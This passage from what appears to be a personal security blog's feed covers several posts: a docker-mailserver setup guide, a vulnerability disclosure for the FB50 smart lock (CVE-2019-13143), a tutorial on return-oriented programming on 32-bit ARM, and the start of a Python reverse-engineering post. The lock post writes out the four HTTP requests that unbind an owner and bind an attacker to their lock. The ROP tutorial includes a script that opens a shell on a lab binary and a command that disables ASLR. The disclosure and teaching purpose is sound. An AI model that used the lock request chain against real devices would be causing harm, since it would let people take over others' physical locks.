<li><p><a href="https://mailinabox.email">Mail-in-a-Box</a>: Unlike the ones above, not a Docker-based solution but definitely worth
a mention. It however, needs a fresh box to work with. A box with absolutely 
nothing else on it. I can&#8217;t afford to do that.</p></li>
<li><p><a href="https://github.com/tomav/docker-mailserver/">docker-mailserver</a>: <strong>The winner</strong>. </p></li>
</ul>

<h2 id="so-docker-mailserver">So… <code>docker-mailserver</code></h2>

<p>The first thing that caught my eye in the README:</p>

<blockquote>
  <p>Recommended:</p>
  
  <ul>
  <li>1 CPU</li>
  <li>1GB RAM</li>
  </ul>
  
  <p>Minimum:</p>
  
  <ul>
  <li>1 CPU</li>
  <li>512MB RAM</li>
  </ul>
</blockquote>

<p>Fantastic, I can somehow squeeze this into my existing VPS.
Setup was fairly simple &amp; the docs are pretty good. It employs a single
<code>.env</code> file for configuration, which is great.
However, I did run into a couple of hiccups here and there.</p>

<p>One especially nasty one was <code>docker</code> / <code>docker-compose</code> running out
of memory.</p>

<pre><code>Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill container 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI runtime state failed: runc did not terminate sucessfully: fatal error: runtime: out of memory
</code></pre>

<p>But it eventually worked after a couple of attempts.</p>

<p>The next thing I struggled with --- DNS. Specifically, the with the step where
the DKIM keys are generated<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>. The output under <br />
<code>config/opendkim/keys/domain.tld/mail.txt</code> <br />
isn&#8217;t exactly CloudFlare friendly; they can&#8217;t be directly copy-pasted into
a <code>TXT</code> record. </p>

<p>This is what it looks like.</p>

<pre><code>mail._domainkey IN  TXT ( "v=DKIM1; h=sha256; k=rsa; "
      "p=&lt;key&gt;"
      "&lt;more key&gt;" )  ; ----- DKIM key mail for icyphox.sh
</code></pre>

<p>But while configuring the record, you set &#8220;Type&#8221; to <code>TXT</code>, &#8220;Name&#8221; to <code>mail._domainkey</code>,
and the &#8220;Value&#8221; to what&#8217;s inside the parenthesis <code>(  )</code>, <em>removing</em> the quotes <code>""</code>. 
Also remove the part that appears to be a comment <code>; ----- ...</code>.</p>

<p>To simplify debugging DNS issues later, it&#8217;s probably a good idea to
point to your mailserver using a subdomain like <code>mail.domain.tld</code> using an 
<code>A</code> record.
You&#8217;ll then have to set an <code>MX</code> record with the &#8220;Name&#8221; as <code>@</code> (or whatever your DNS provider
uses to denote the root domain) and the &#8220;Value&#8221; to <code>mail.domain.tld</code>.
And finally, the <code>PTR</code> (pointer record, I think), which is the reverse of 
your <code>A</code> record --- &#8220;Name&#8221; as the server IP and &#8220;Value&#8221; as <code>mail.domain.tld</code>.
I learnt this part the hard way, when my outgoing email kept getting
rejected by Tutanota&#8217;s servers.</p>

<p>Yet another hurdle --- SSL/TLS certificates. This isn&#8217;t very properly
documented, unless you read through the <a href="https://github.com/tomav/docker-mailserver/wiki/Installation-Examples">wiki</a>
and look at an example. In short, install <code>certbot</code>, have port 80 free,
and run </p>

<div class="codehilite"><pre><span></span><code>$ certbot certonly --standalone -d mail.domain.tld
</code></pre></div>

<p>Once that&#8217;s done, edit the <code>docker-compose.yml</code> file to mount <code>/etc/letsencrypt</code> in 
the container, something like so:</p>

<div class="codehilite"><pre><span></span><code><span class="nn">...</span>

<span class="nt">volumes</span><span class="p">:</span>
    <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">maildata:/var/mail</span>
    <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">mailstate:/var/mail-state</span>
    <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">./config/:/tmp/docker-mailserver/</span>
    <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">/etc/letsencrypt:/etc/letsencrypt</span>

<span class="nn">...</span>
</code></pre></div>

<p>With this done, you shouldn&#8217;t have mail clients complaining about 
wonky certs for which you&#8217;ll have to add an exception manually.</p>

<h2 id="why-would-you">Why would you…?</h2>

<p>There are a few good reasons for this:</p>

<h3 id="privacy">Privacy</h3>

<p>No really, this is <em>the</em> best choice for truly private
email. Not ProtonMail, not Tutanota. Sure, they claim so and I don&#8217;t 
dispute it. Quoting Drew Devault<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>,</p>

<blockquote>
  <p>Truly secure systems do not require you to trust the service provider.</p>
</blockquote>

<p>But you have to <em>trust</em> ProtonMail. They run open source software, but
how can you really be sure that it isn&#8217;t a backdoored version of it?</p>

<p>When you host your own mailserver, you truly own your email without having to rely on any
third-party.
This isn&#8217;t an attempt to spread FUD. In the end, it all depends on your
threat model™.</p>

<h3 id="decentralization">Decentralization</h3>

<p>Email today is basically run by Google. Gmail has over 1.2 <em>billion</em>
active users. That&#8217;s obscene.
Email was designed to be decentralized but big corps swooped in and
made it a product. They now control your data, and it isn&#8217;t unknown that
Google reads your mail. This again loops back to my previous point, privacy.
Decentralization guarantees privacy. When you control your mail, you subsequently
control who reads it.</p>

<h3 id="personalization">Personalization</h3>

<p>Can&#8217;t ignore this one. It&#8217;s cool to have a custom email address to flex.</p>

<p><code>x@icyphox.sh</code> vs <code>gabe.newell4321@gmail.com</code></p>

<p>Pfft, this is no competition.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-1">
<p>My <a href="https://twitter.com/icyphox/status/1161648321548566528">tweet</a> of frustration.&#160;<a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-2">
<p><a href="https://github.com/tomav/docker-mailserver#generate-dkim-keys">Link</a> to step in the docs.&#160;<a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>

<li id="fn-3">
<p>From his <a href="https://drewdevault.com/2018/08/08/Signal.html">article</a> on why he doesn&#8217;t trust Signal.&#160;<a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/mailserver</link><pubDate>Thu, 15 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mailserver</guid></item><item><title>Picking the FB50 smart lock (CVE-2019-13143)</title><description><![CDATA[<p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7&#8217;s Blog</a>, with my edits</em>)</p>

<h2 id="the-lock">The lock</h2>

<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
across many ecommerce sites, and has over, an estimated, 15k+ users.</p>

<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
the Play/App Store to function. The app requires the user to create an
account before further functionality is available. 
It also facilitates configuring the fingerprint,
and unlocking from a range via Bluetooth.</p>

<p>We had two primary attack surfaces we decided to tackle---Bluetooth (BLE)
and the Android app.</p>

<h2 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h2>

<p>Android phones have the ability to capture Bluetooth (HCI) traffic
which can be enabled under Developer Options under Settings. We made 
around 4 &#8220;unlocks&#8221; from the Android phone, as seen in the screenshot.</p>

<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>

<p>This is the value sent in the <code>Write</code> request:</p>

<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>

<p>We attempted replaying these requests using <code>gattool</code> and <code>gattacker</code>,
but that didn&#8217;t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>

<h2 id="via-the-android-app">Via the Android app</h2>

<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn&#8217;t get us too
far since most of it was obfuscated. Why bother when there exists an 
easier approach---BurpSuite.</p>

<p>We captured and played around with a bunch of requests and responses,
and finally arrived at a working exploit chain.</p>

<h2 id="the-exploit">The exploit</h2>

<p>The entire exploit is a 4 step process consisting of authenticated 
HTTP requests:</p>

<ol>
<li>Using the lock&#8217;s MAC (obtained via a simple Bluetooth scan in the 
vicinity), get the barcode and lock ID</li>
<li>Using the barcode, fetch the user ID</li>
<li>Using the lock ID and user ID, unbind the user from the lock</li>
<li>Provide a new name, attacker&#8217;s user ID and the MAC to bind the attacker
to the lock</li>
</ol>

<p>This is what it looks like, in essence (personal info redacted).</p>

<h3 id="request-1">Request 1</h3>

<pre><code>POST /oklock/lock/queryDevice
{"mac":"XX:XX:XX:XX:XX:XX"}
</code></pre>

<p>Response:</p>

<pre><code>{
   "result":{
      "alarm":0,
      "barcode":"&lt;BARCODE&gt;",
      "chipType":"1",
      "createAt":"2019-05-14 09:32:23.0",
      "deviceId":"",
      "electricity":"95",
      "firmwareVersion":"2.3",
      "gsmVersion":"",
      "id":&lt;LOCK ID&gt;,
      "isLock":0,
      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
      "lockPwd":"000000",
      "mac":"XX:XX:XX:XX:XX:XX",
      "name":"lock",
      "radioName":"BlueFPL",
      "type":0
   },
   "status":"2000"
}
</code></pre>

<h3 id="request-2">Request 2</h3>

<pre><code>POST /oklock/lock/getDeviceInfo

{"barcode":"https://app.oklok.com.cn/app.html?id=&lt;BARCODE&gt;"}
</code></pre>

<p>Response:</p>

<pre><code>   "result":{
      "account":"email@some.website",
      "alarm":0,
      "barcode":"&lt;BARCODE&gt;",
      "chipType":"1",
      "createAt":"2019-05-14 09:32:23.0",
      "deviceId":"",
      "electricity":"95",
      "firmwareVersion":"2.3",
      "gsmVersion":"",
      "id":&lt;LOCK ID&gt;,
      "isLock":0,
      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
      "lockPwd":"000000",
      "mac":"XX:XX:XX:XX:XX:XX",
      "name":"lock",
      "radioName":"BlueFPL",
      "type":0,
      "userId":&lt;USER ID&gt;
   }
</code></pre>

<h3 id="request-3">Request 3</h3>

<pre><code>POST /oklock/lock/unbind

{"lockId":"&lt;LOCK ID&gt;","userId":&lt;USER ID&gt;}
</code></pre>

<h3 id="request-4">Request 4</h3>

<pre><code>POST /oklock/lock/bind

{"name":"newname","userId":&lt;USER ID&gt;,"mac":"XX:XX:XX:XX:XX:XX"}
</code></pre>

<h2 id="thats-it-the-scary-stuff">That&#8217;s it! (&amp; the scary stuff)</h2>

<p>You should have the lock transferred to your account. The severity of this
issue lies in the fact that the original owner completely loses access to
their lock. They can&#8217;t even &#8220;rebind&#8221; to get it back, since the current owner 
(the attacker) needs to authorize that. </p>

<p>To add to that, roughly 15,000 user accounts&#8217; info are exposed via IDOR.
Ilja, a cool dude I met on Telegram, noticed locks named &#8220;carlock&#8221;, 
&#8220;garage&#8221;, &#8220;MainDoor&#8221;, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>

<p><em>shudders</em></p>

<h2 id="proof-of-concept">Proof of Concept</h2>

<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>

<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>

<h2 id="disclosure-timeline">Disclosure timeline</h2>

<ul>
<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
<li>No response from vendor</li>
<li><strong>2nd August 2019</strong>: Public disclosure</li>
</ul>

<h2 id="lessons-learnt">Lessons learnt</h2>

<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You&#8217;re better off with the &#8220;dumb&#8221; ones
with keys. With the IoT plague spreading, it brings in a large attack surface
to things that were otherwise &#8220;unhackable&#8221; (try hacking a &#8220;dumb&#8221; toaster).</p>

<p>The IoT security scene is rife with bugs from over 10 years ago, like
executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development 
practices in general.</p>

<p>Our existing threat models and scenarios have to be updated to factor 
in these new exploitation possibilities. This also broadens the playing 
field for cyber warfare and mass surveillance campaigns. </p>

<h2 id="researcher-info">Researcher info</h2>

<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>

<ul>
<li>Anirudh Oppiliappan (me)</li>
<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
</ul>

<div class="footnotes">
<hr />
<ol>
<li id="fn-1">
<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption.&#160;<a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-2">
<p>Thanks to Ilja Shaposhnikov (@drakylar).&#160;<a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>

<li id="fn-3">
<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a>&#160;<a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/fb50</link><pubDate>Mon, 05 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/fb50</guid></item><item><title>Return Oriented Programming on ARM (32-bit)</title><description><![CDATA[<p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
assembly to follow along. I highly recommend
<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
Basics</a>. Once you’re
comfortable with it, proceed with the next bit---environment setup.</p>

<h2 id="setup">Setup</h2>

<p>Since we’re working with the ARM architecture, there are two options to go
forth with: </p>

<ol>
<li>Emulate---head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU. 
And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
The scripts found inside should be self-explanatory.</li>
<li>Use actual ARM hardware, like an RPi.</li>
</ol>

<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
may use <code>radare2</code>, IDA or anything else, really. All of which can be
trivially installed.</p>

<p>And for the sake of simplicity, disable ASLR:</p>

<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> &gt; /proc/sys/kernel/randomize_va_space
</code></pre></div>

<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
<a href="/static/files/roplevel2.c">roplevel2</a>. </p>

<p>Compile it:</p>

<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
</code></pre></div>

<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>

<h2 id="a-primer-on-rop">A primer on ROP</h2>

<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code sigining</strong>.
In essence, no code in the binary is actually modified and the entire exploit
is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>

<p>A gadget is essentially a small sequence of code (instructions), ending with
a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
These gadgets are <em>chained</em> together by jumping (returning) from one onto the other
to form what’s called as a <strong>ropchain</strong>. At the end of a ropchain,
there’s generally a call to <code>system()</code>, to acheive code execution.</p>

<p>In practice, the process of executing a ropchain is something like this:</p>

<ul>
<li>confirm the existence of a stack-based buffer overflow</li>
<li>identify the offset at which the instruction pointer gets overwritten</li>
<li>locate the addresses of the gadgets you wish to use</li>
<li>craft your input keeping in mind the stack’s layout, and chain the addresses
of your gadgets</li>
</ul>

<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=46&amp;t=0s">beautiful video</a> where he explains ROP using “weird machines”. 
Check it out, it might be just what you needed for that “aha!” moment :)</p>

<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
that should put things into perspective.</p>

<h2 id="exploring-our-binary">Exploring our binary</h2>

<p>Start by running it, and entering any arbitrary string. On entering a fairly
large string, say, “A” × 20, we
see a segmentation fault occur.</p>

<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>

<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>

<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>

<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and 
<code>gadget</code>. Disassembling the <code>main</code> function:</p>

<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>

<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are 
never actually called.</p>

<p>Disassembling the <code>gadget</code> function:</p>

<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>

<p>This is fairly simple, the stack is being initialized by <code>push</code>ing <code>{r11}</code>,
which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
instruction in the middle. This is a <strong>gadget</strong>.</p>

<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in x86 where
arguments to functions are passed on the stack, in ARM the registers <code>r0</code> to <code>r3</code>
are used for this. So this gadget effectively allows us to pass arguments to
functions using <code>r0</code>, and subsequently jumping to them by passing its address
in <code>pc</code>. Neat.</p>

<p>Moving on to the disassembly of the <code>winner</code> function:</p>

<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>

<p>Here, we see a calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
So our end goal here is to, quite obviously, execute code via the <code>system()</code>
function.</p>

<p>Now that we have an overview of what’s in the binary, let’s formulate a method
of exploitation by messing around with inputs.</p>

<h2 id="messing-around-with-inputs">Messing around with inputs :^)</h2>

<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
screenshot.</p>

<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>

<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
the <code>pc</code> has been overwritten with our input.
So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.</p>

<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>

<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset
of the second instruction---<code>add r11, sp, #4</code>. 
For this, we’ll use Python to print our input string replacing <code>FFFF</code> with
the address of <code>winner</code>. Note the endianness.</p>

<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">&#39;print(&quot;AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00&quot;)&#39;</span> <span class="p">|</span> ./rop2
</code></pre></div>

<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>

<p>The reason we don’t jump to the first instruction is because we want to control the stack
ourselves. If we allow <code>push {rll, lr}</code> (first instruction) to occur, the program will <code>pop</code>
those out after <code>winner</code> is done executing and we will no longer control 
where it jumps to.</p>

<p>So that didn’t do much, just prints out a string “Nothing much here&#8230;”. 
But it <em>does</em> however, contain <code>system()</code>. Which somehow needs to be populated with an argument
to do what we want (run a command, execute a shell, etc.).</p>

<p>To do that, we’ll follow a multi-step process: </p>

<ol>
<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
<li>Push our command to be executed, say “<code>/bin/sh</code>” onto the stack. This will go into
<code>r0</code>.</li>
<li>Then, push the address of <code>system()</code>. And this will go into <code>pc</code>.</li>
</ol>

<p>The pseudo-code is something like this:</p>

<pre><code>string = AAAABBBBCCCCDDDDEEEE
gadget = # addr of gadget
binsh  = # addr of /bin/sh
system = # addr of system()

print(string + gadget + binsh + system)
</code></pre>

<p>Clean and mean.</p>

<h2 id="the-exploit">The exploit</h2>

<p>To write the exploit, we’ll use Python and the absolute godsend of a library---<code>struct</code>.
It allows us to pack the bytes of addresses to the endianness of our choice.
It probably does a lot more, but who cares.</p>

<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
at <code>main</code>, hit <code>r</code> to run, and search the entire address space for the string “<code>/bin/sh</code>”:</p>

<pre><code>(gdb) find &amp;system, +9999999, "/bin/sh"
</code></pre>

<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>

<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
found from the disassmblies from earlier. Here’s the final exploit code:</p>

<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>

<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>
<span class="n">string</span> <span class="o">=</span> <span class="s2">&quot;AAAABBBBCCCCDDDDEEEE&quot;</span>
<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>

<span class="nb">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
</code></pre></div>

<p>Honestly, not too far off from our pseudo-code :)</p>

<p>Let’s see it in action:</p>

<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>

<p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates
when the pipe closes, since there’s no input coming in from STDIN.
To get around this, we use <code>cat(1)</code> which allows us to relay input through it
to the shell. Nifty trick.</p>

<h2 id="conclusion">Conclusion</h2>

<p>This was a fairly basic challenge, with everything laid out conveniently. 
Actual ropchaining is a little more involved, with a lot more gadgets to be chained
to acheive code execution.</p>

<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
]]></description><link>https://icyphox.sh/blog/rop-on-arm</link><pubDate>Thu, 06 Jun 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/rop-on-arm</guid></item><item><title>My setup</title><description><![CDATA[<h2 id="hardware">Hardware</h2>

<p>The only computer I have with me is my <a href="https://store.hp.com/us/en/mdp/laptops/envy-13">HP Envy 13 (2018)</a> (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u,
8 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.</p>

<p>For my phone, I use a <a href="https://www.oneplus.in/6t">OnePlus 6T</a>, running stock <a href="https://www.oneplus.in/oxygenos">OxygenOS</a>. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted.
I’m also a proud owner of a <a href="https://en.wikipedia.org/wiki/Nexus_5">Nexus 5</a>, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.</p>

<p>My watch is a <a href="https://www.samsung.com/in/wearables/gear-s3-frontier-r760/">Samsung Gear S3 Frontier</a>. Tizen is definitely better than Android Wear.</p>

<p>My keyboard, although not with me in college, is a very old <a href="https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO">Dell SK-8110</a>. 
For the little bit of gaming that I do, I use a <a href="https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html">HP m150</a> gaming mouse. It’s the perfect size (and color).</p>

<p>For my music, I use the <a href="https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html">Bose SoundLink II</a>. 
Great pair of headphones, although the ear cups need replacing.</p>

<h2 id="and-the-software">And the software</h2>

<p><del>My distro of choice for the past ~1 year has been <a href="https://elementary.io">elementary OS</a>. I used to be an Arch Linux elitist, complete with an esoteric
window manager, all riced. I now use whatever JustWorks™.</del></p>

<p><strong>Update</strong>: As of June 2019, I&#8217;ve switched over to a vanilla Debian 9 Stretch install,
running <a href="https://i3wm.org">i3</a> as my window manager. If you want, you can dig through my configs at my <a href="https://github.com/icyphox/dotfiles">dotfiles</a> repo. </p>

<p>Here’s a (riced) screenshot of my desktop. </p>

<p><img src="https://i.redd.it/jk574gworp331.png" alt="scrot" /></p>

<p>Most of my work is done in either the browser, or the terminal.
My shell is pure <a href="http://www.zsh.org">zsh</a>, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need
a framework. It’s useless bloat. The prompt itself is generated using a framework I built in <a href="https://nim-lang.org">Nim</a>---<a href="https://github.com/icyphox/nicy">nicy</a>.
My primary text editor is <a href="https://neovim.org">nvim</a>. Again, all configs in my dotfiles repo linked above.
I manage all my passwords using <a href="https://passwordstore.org">pass(1)</a>, and I use <a href="https://github.com/carnager/rofi-pass">rofi-pass</a> to access them via <code>rofi</code>.</p>

<p>Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace
clean and a single command to drop into a Kali shell.</p>

<p>I use a DigitalOcean droplet (BLR1) as a public filehost, found at <a href="https://x.icyphox.sh">x.icyphox.sh</a>. The UI is the wonderful <a href="https://github.com/zeit/serve">serve</a>, by <a href="https://zeit.co">ZEIT</a>.
The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes. </p>

<p>I plan on converting my desktop back at home into a homeserver setup. Soon™.</p>
]]></description><link>https://icyphox.sh/blog/my-setup</link><pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/my-setup</guid></item><item><title>Python for Reverse Engineering #1: ELF Binaries</title><description><![CDATA[<p>While solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.</p>

<p>Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually build your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.</p>

<h2 id="setup">Setup</h2>

<p>As the title suggests, you’re going to need a Python 3 interpreter before
anything else. Once you’ve confirmed beyond reasonable doubt that you do,
in fact, have a Python 3 interpreter installed on your system, run</p>

<div class="codehilite"><pre><span></span><code><span class="gp">$</span> pip install capstone pyelftools
</code></pre></div>

<p>where <code>capstone</code> is the disassembly engine we’ll be scripting with and <code>pyelftools</code> to help parse ELF files.</p>

<p>With that out of the way, let’s start with an example of a basic reversing
challenge.</p>

<div class="codehilite"><pre><span></span><code><span class="cm">/* chall.c */</span>

<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"></span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
   <span class="kt">char</span> <span class="o">*</span><span class="n">pw</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">9</span><span class="p">);</span>
   <span class="n">pw</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;a&#39;</span><span class="p">;</span>
   <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span>
       <span class="n">pw</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">pw</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
   <span class="p">}</span>
   <span class="n">pw</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;\0&#39;</span><span class="p">;</span>
   <span class="kt">char</span> <span class="o">*</span><span class="n">in</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
   <span class="n">printf</span><span class="p">(</span><span class="s">&quot;password: &quot;</span><span class="p">);</span>
   <span class="n">fgets</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>        <span class="c1">// &#39;abcdefghi&#39;</span>
   <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="n">pw</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
       <span class="n">printf</span><span class="p">(</span><span class="s">&quot;haha yes!</span><span class="se">\n</span><span class="s">&quot;</span><span class="p">);</span>
   <span class="p">}</span>
   <span class="k">else</span> <span class="p">{</span>
       <span class="n">printf</span><span class="p">(</span><span class="s">&quot;nah dude</span><span class="se">\n</span><span class="s">&quot;</span><span class="p">);</span>
   <span class="p">}</span>
<span class="p">}</span>
</code></pre></div>

<p>Compile it with GCC/Clang:</p>

